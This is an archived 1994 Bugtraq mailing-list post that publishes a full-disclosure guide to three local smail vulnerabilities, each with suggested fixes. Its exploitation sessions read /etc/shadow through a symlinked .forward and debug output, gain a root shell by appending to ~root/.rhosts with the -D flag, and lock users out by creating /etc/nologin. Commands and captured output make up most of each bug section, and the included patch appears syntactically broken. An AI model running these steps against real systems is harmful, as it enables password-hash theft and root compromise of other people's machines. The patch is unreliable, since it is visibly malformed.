[39] in bugtraq
Earlier mail from the bugtraq mailing list... forwarded.
wchuang@ATHENA.MIT.EDU (wchuang@ATHENA.MIT.EDU)
Tue Oct 18 18:45:56 1994
Received: from PACIFIC-CARRIER-ANNEX.MIT.EDU by po6.MIT.EDU (5.61/4.7) id AA18183; Sun, 9 Oct 94 09:09:33 EDT
Received: from villa.fc.net by MIT.EDU with SMTP
id AA23813; Sun, 9 Oct 94 09:09:33 EDT
Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by villa.fc.net (8.6.8.1/8.6.6) with ESMTP id CAA15079 for <bugtraq-outgoing@villa.fc.net>; Sun, 9 Oct 1994 02:14:24 -0500
Received: (from majordom@localhost) by freeside.fc.net (8.6.8.1/8.6.6) id CAA07742 for bugtraq-outgoing@villa.fc.net; Sun, 9 Oct 1994 02:15:22 -0500
Received: from altair.csustan.edu (altair.csustan.edu [130.17.1.50]) by freeside.fc.net (8.6.8.1/8.6.6) with SMTP id CAA07722 for <bugtraq@fc.net>; Sun, 9 Oct 1994 02:14:53 -0500
Received: by altair.csustan.edu (4.1/1.12)
id AA29110; Sun, 9 Oct 94 00:09:02 PDT
Date: Sun, 9 Oct 94 00:09:02 PDT
From: xcelsior@altair.csustan.edu (Excelsior)
Message-Id: <9410090709.AA29110@altair.csustan.edu>
To: bugtraq@fc.net
Subject: Re: 3 SMAIL BUGS
Sender: bugtraq-owner@crimelab.com
Precedence: bulk
aleph1@dfw.net (Aleph One) spewed....
>Ok for all of you asking which are the 3
>here is the count down:
>
>Number 3 - The SMTP DEBUG problem. Anyone can
> telnet to your SMTP port and read any
> file on the system.
You are exaggerating the problem. To exploit this, you have to have
an account on the local machine (in order to create the ~/.forward
link). Not just "anyone" can exploit it.
> Fixed by adding
> -smtp_debug in your smail config file.
Wrong wrong wrong! All the -smtp_debug flag does is keep you from
exploiting it by telnetting directly to the smtp port. There is
an easier way to exploit it.
>Number 2 - The .forward problem. Another
> configuration problem. Smail does not
> check file atributes when delivering mail
^^^^^^^^^^^^^^
Wrong again. It does checks the file attributes, but not the attributes
of the DIRECTORY you are trying to create the file in - thus causing
the problem.
> to a file pointed to by a .forward. Fixed
> by adding the check_path attribute to the
> forward file director.
>
>and
>
>Number 1 - Debug file bug. Smail create or append to
> anyfile using the debug options!
How about explaining those bugs in detail? If I wanted to hear
"There is a bug" with no explaination, I'd read CERT. Maybe
you don't know how the bugs work, but if you do, don't be a WUSS
- post it!
>There. What I said will fix #1 and #2.
Nope, what you said will definitely NOT fix #1 or #3. You can fix
#2 as you described, but you weren't very specific about it, were you?
> Several different
> patches have been posted for #3 on usenet. Check
> comp.mail.smail and the comp.is.linux.* newsgroups.
> Also the maintainers of smail will fixed RSN.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Isn't that a little harsh? How about just giving them a course in
writing secure Setuid programs. :)
Ok, now everyone repeat after me:
BUGTRAQ IS A FULL DISCLOSURE LIST
That's right. FULL disclosure. Since all the elite cracker pussies
are too scared to describe their bugs in detail, I will. I am
including a security doc on smail that I wrote a little while ago.
I'm sure most of the cracker dudes got it from my DocServer and FTP
site, so here it comes to the rest of you. I hope this encourages
more people to stop being childish and post your bugs. I'll be
posting more goodies from my archives soon as well.
Share and enjoy.... :)
-------------------------------------------------
EXCELSIOR'S GUIDE TO SMAIL BUGS - Sept 1994
***
Bug #1
***
SYNOPSIS
--------
Use of ~/.forward and debug lets a local user read any file on the system.
EXAMPLE OF EXPLOITATION
-----------------------
loser@possesux ~> ln -s /etc/shadow .forward
loser@possesux ~> ls -la .forward
lrwxrwxrwx 1 loser users 11 Sep 5 12:08 .forward -> /etc/shadow
loser@possesux ~> telnet localhost smtp
Trying 127.0.0.1...
Connected to localhost-gw.
Escape character is '^]'.
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:10
PDT
debug 20
250 Debugging level: 20
expn loser
[lots of crap]
expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile: opening forward file /home/loser/.forward
[more crap]
read 890 bytes
director dotforward: matched loser, forwarded to
root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection
Connection closed by foreign host.
---------------
Contrary to popular belief, adding -smtp_debup to your smail config file
will NOT prevent this bug from occuring. It will just prevent exploitation
via the smtp port.
We can just do this....
----------
loser@possesux ~> smail -bs -v20
expand_string($primary_name Smail$version ready for fakemail on $date,(null),
(null)) called
expand_string returns possesux.warez.mil Smail3.1.28.1 ready for fakemail on
Mon, 5 Sep 94 12:15 PDT
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15
PDT
expn loser
[same crap as before]
expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile: opening forward file /home/loser/.forward
[more of same crap]
read 890 bytes
director dotforward: matched loser, forwarded to
root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[.....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection
----------
The easy way to fix this is to nuke the -d and -v options from smail.
***
Bug #2
***
SYNOPSIS
--------
Smail called with the -D flag will allow you to create and append to any
file on the system.
EXAMPLE OF EXPLOITATION
-----------------------
loser@possesux ~> cat ~/.forward
localhost loser
^D
loser@possesux ~> smail -bs -D ~root/.rhosts -v20
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:23
PDT
expn loser
250 loser
quit
221 possesux.warez.mil closing connection
loser@possesux ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=0(root) gid=0(root)
--------------
Neat, huh? Patch by nuking the -D option from smail.
I received the following patch recently. I haven't tested it, so use
at your own risk.
*** Omain.c Wed Mar 11 12:33:18 1993
--- main.c Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
}
- /*
- * change error file to debugging file from -D option, if any
- */
-
- if (arg_debug_file) {
- new_errfile = fopen(arg_debug_file, "a");
- if (new_errfile == NULL) {
- write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
- arg_debug_file, strerrno(errno));
- arg_debug_file = NULL;
- } else {
- errfile = new_errfile;
- fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
- program, (long)getpid());
- }
- }
-
- /*
* read in the transport, router and director files, if needed
*
* NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
***************
*** 525,530 ****
--- 508,537 ----
if (prog_euid != REQUIRED_EUID)
queue_only = TRUE;
#endif
+
+ /*
+ * change error file to debugging file from -D option, if any
+ *
+ * JMJ: Change location of this fragment to below the setuid/setgid
+ * calls to allow for use of fopen_as_user() instead of just
+ * fopen().
+ *
+ * Side effect: -D now requires full pathname to debug file
+ */
+
+ if (arg_debug_file) {
+ new_errfile = fopen_as_user(arg_debug_file, "a", 1, real_uid,
+ prog_egid, 0600);
+ write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+ arg_debug_file, strerrno(errno));
+ arg_debug_file = NULL;
+ } else {
+ errfile = new_errfile;
+ fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
+ program, (long)getpid());
+ }
+ }
/*
* error processing can be other than TERMINAL only for
--
***
Bug #3
***
SYNOPSIS
--------
Files specified in ~/.forward can be created in any directory, regardless
of it's permissions. (File is still owned by mailbox owner, however.)
EXAMPLE OF EXPLOITATION
-----------------------
loser@possesux ~> echo "/etc/nologin" > ~/.forward
loser@possesux ~> mail -r root loser < /dev/null
loser@possesux ~> echo "Site shutdown due to smail lameness" >! /etc/nologin
loser@possesux ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.
---------
Plug up this hole by adding 'check_path' to the following part of
your /usr/lib/smail/transports file:
---
[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file: driver = appendfile,
return_path, local, from, unix_from_hack;
file = $user, # file is taken from address
append_as_user, # use user-id associated with address
expand_user, # expand ~ and $ within address
check_path, #<--add this line
suffix = "\n",
mode = 0644
[...]
---
That's it for now. If you appreciated reading this file, then consider
posting your explotation scripts too.
Share and enjoy!
- Excelsior
